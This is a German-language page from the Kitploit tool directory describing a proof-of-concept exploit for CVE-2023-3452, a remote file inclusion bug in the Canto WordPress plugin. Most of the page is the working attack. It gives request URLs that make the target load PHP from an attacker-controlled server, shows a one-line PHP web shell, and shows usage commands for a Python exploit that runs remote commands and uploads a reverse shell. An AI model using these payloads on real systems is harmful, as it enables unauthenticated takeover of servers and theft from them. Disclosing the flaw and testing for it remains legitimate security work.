Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-3452-PoC — Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) und Remote Code Execution (RCE) | Kitploit
Tools/GitHubGitHub/leoanggal1/cve-2023-3452-poc
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubleoanggal1/cve-2023-3452-poc

CVE-2023-3452-PoC

Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) und Remote Code Execution (RCE)

Repository anzeigen
1711vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2023-3452-PoC - Wordpress Plugin Canto < 3.0.5 - Remote File Inclusion (RFI) - Remote Code Execution (RCE) - Unauthenticated

Hier erklären wir einen PoC der aktuellen RFI (Remote File Inclusion) Schwachstelle des Canto Wordpress-Plugins und haben einen Exploit entwickelt, um die Ausführung von Befehlen zu automatisieren.

„Das Canto-Plugin für WordPress ist anfällig für Remote File Inclusion in Versionen bis einschließlich 3.0.4 über den Parameter 'wp_abspath'. Dies ermöglicht es nicht authentifizierten Angreifern, beliebigen entfernten Code auf dem Server einzuschleusen und auszuführen, sofern allow_url_include aktiviert ist. Local File Inclusion ist ebenfalls möglich, jedoch weniger nützlich, da der Angreifer in der Lage sein muss, eine bösartige PHP-Datei per FTP oder auf andere Weise in ein vom Webserver lesbares Verzeichnis hochzuladen.“ (https://nvd.nist.gov/vuln/detail/CVE-2023-3452)

Dieser Exploit nutzt einen Fehler im Parameter wp_abspath, wie in der folgenden Codezeile in includes/lib/download.php zu sehen ist:

root@kitploit:~
...

require_once($_REQUEST['wp_abspath'] . '/wp-admin/admin.php');

...

Um diese Schwachstelle auszunutzen, muss außerdem der Parameter allow_url_include=On in der PHP-Konfiguration aktiviert sein.

Es ist möglich, Anfragen mit diesem Parameter zu stellen, die auf unseren Webserver verweisen, von dem aus PHP-Code interpretiert wird. Wenn wir beispielsweise die folgende Anfrage stellen, können wir überprüfen, dass die Anfrage auf unserem Server eingeht:

root@kitploit:~
http://192.168.1.142/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://192.168.1.33:8080

image

Wir sehen, dass der Server die Datei /wp-admin/admin.php aufruft. Wenn wir also das Verzeichnis erstellen und unseren bösartigen PHP-Code in die Datei admin.php einfügen, lädt der anfällige Server diese herunter und führt sie korrekt aus. Wenn wir beispielsweise in unsere admin.php eine PHP-Web-Shell <?php system($_GET['cmd']); ?> schreiben, können wir Code aus der Ferne ausführen.

root@kitploit:~
http://192.168.1.142/wp-content/plugins/canto/includes/lib/download.php?wp_abspath=http://192.168.1.33:8080&cmd=whoami

image

All dies wurde im Python-Exploit CVE-2023-3452.py automatisiert.

Verwendung des Exploits

  • Ausführen eines entfernten Befehls:
root@kitploit:~
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -c 'id'

image

  • Hochladen der Pentesmonkey Reverse Shell:
root@kitploit:~
python3 CVE-2023-3452.py -u http://192.168.1.142 -LHOST 192.168.1.33 -NC_PORT 3333 -s php-reverse-shell.php

image

Referenzen

  • https://nvd.nist.gov/vuln/detail/CVE-2023-3452
  • https://wordpress.com/es/plugins/canto

Kontakt

  • E-Mail: [email protected]
  • LinkedIn: Leopoldo Angulo Gallego
Tool herunterladen